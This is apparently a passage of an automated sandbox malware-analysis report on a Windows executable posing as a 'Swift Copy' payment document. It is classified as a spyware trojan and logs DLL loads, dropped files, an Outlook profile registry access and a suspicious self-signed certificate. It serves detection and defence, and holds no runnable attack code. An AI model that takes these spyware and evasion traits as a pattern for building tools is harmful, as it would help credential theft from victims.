            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_3910A3B06_2_3910A3B0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_391009BF6_2_391009BF
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_3910F1D06_2_3910F1D0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_391009D06_2_391009D0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_39108DD06_2_39108DD0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_3910BFD06_2_3910BFD0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_3910DBF06_2_3910DBF0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_3910A9F06_2_3910A9F0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_391035E86_2_391035E8
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_3910C6106_2_3910C610
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_391094106_2_39109410
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_3910F8106_2_3910F810
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_391000126_2_39100012
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_391018176_2_39101817
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_3910B0306_2_3910B030
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_3910E2306_2_3910E230
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_391018286_2_39101828
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_39109A506_2_39109A50
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_3910CC506_2_3910CC50
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_391000406_2_39100040
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_3910CC416_2_3910CC41
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_3910E8706_2_3910E870
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_3910B6706_2_3910B670
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_3910A0906_2_3910A090
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_3910D2906_2_3910D290
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_39100E986_2_39100E98
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_39100E8D6_2_39100E8D
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_3910BCB06_2_3910BCB0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_39108AB06_2_39108AB0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_3910EEB06_2_3910EEB0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_3910D8D06_2_3910D8D0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_3910A6D06_2_3910A6D0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_3910F4F06_2_3910F4F0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_391090F06_2_391090F0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_3910C2F06_2_3910C2F0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_391004FE6_2_391004FE
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_39101CE06_2_39101CE0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_392639986_2_39263998
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_39261DF86_2_39261DF8
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_392632B06_2_392632B0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_392616D86_2_392616D8
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_39262BC86_2_39262BC8
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_39260FF06_2_39260FF0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_392624E06_2_392624E0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_392639896_2_39263989
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_39261DE86_2_39261DE8
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_392632A06_2_392632A0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_392616D46_2_392616D4
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_39260B326_2_39260B32
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_39262BB96_2_39262BB9
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_39260BC06_2_39260BC0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_39264A876_2_39264A87
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_39260C786_2_39260C78
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_39260FE06_2_39260FE0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_392601E86_2_392601E8
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_392601DB6_2_392601DB
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_392624D06_2_392624D0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_398F49586_2_398F4958
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_398F1B146_2_398F1B14
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_398FB4506_2_398FB450
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: String function: 00402AD0 appears 51 times
            Source: Swift Copy_18.02.2025.exeStatic PE information: invalid certificate
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3915907778.0000000035C37000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Swift Copy_18.02.2025.exe
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3891789950.00000000056F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Swift Copy_18.02.2025.exe
            Source: Swift Copy_18.02.2025.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/17@5/5
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 0_2_0040458C GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_0040458C
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 0_2_0040206A CoCreateInstance,0_2_0040206A
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\premierministerJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeMutant created: NULL
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeFile created: C:\Users\user\AppData\Local\Temp\nss284E.tmpJump to behavior
            Source: Swift Copy_18.02.2025.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Swift Copy_18.02.2025.exeVirustotal: Detection: 25%
            Source: Swift Copy_18.02.2025.exeReversingLabs: Detection: 21%
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeFile read: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe "C:\Users\user\Desktop\Swift Copy_18.02.2025.exe"
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess created: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe "C:\Users\user\Desktop\Swift Copy_18.02.2025.exe"
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess created: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe "C:\Users\user\Desktop\Swift Copy_18.02.2025.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: stempelpudernes.lnk.0.drLNK file: ..\Pictures\muringerne\giggliest.pha
            Source: dinosaurusserne.lnk.0.drLNK file: ..\..\..\..\Users\Public\Pictures\eksistensberettigelsen.pre
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000000.00000002.2822262362.0000000004E4B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3877810810.00000000035FB000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 0_2_0040620C GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_0040620C
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 0_2_10002D50 push eax; ret 0_2_10002D7E
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_055A9C30 push esp; retf 055Ch6_2_055A9D55
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_398F349B push ss; retf 6_2_398F34AE

            Persistence and Installation Behavior

            barindex
            Source: Initial sampleJoe Sandbox AI: Detected suspicious elements in PE signature: Multiple highly suspicious indicators: 1) Self-signed certificate (issuer matches subject), 2) Invalid signature that's not trusted by provider, 3) Suspicious email domain 'Penury.Wie' which appears non-corporate and potentially fake, 4) Large time gap between compilation date (2013) and certificate creation (2025) suggests possible timestamp manipulation, 5) Organization name 'Forhaandstilsagns' appears randomly generated or suspicious, 6) While the country (FR) is not inherently suspicious, the combination with other factors suggests potential location spoofing. The certificate was created very recently (Feb 2025) which, combined with other suspicious elements, suggests this could be a newly created malicious file masquerading as legitimate software.
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeFile created: C:\Users\user\AppData\Local\Temp\nsp2DFD.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
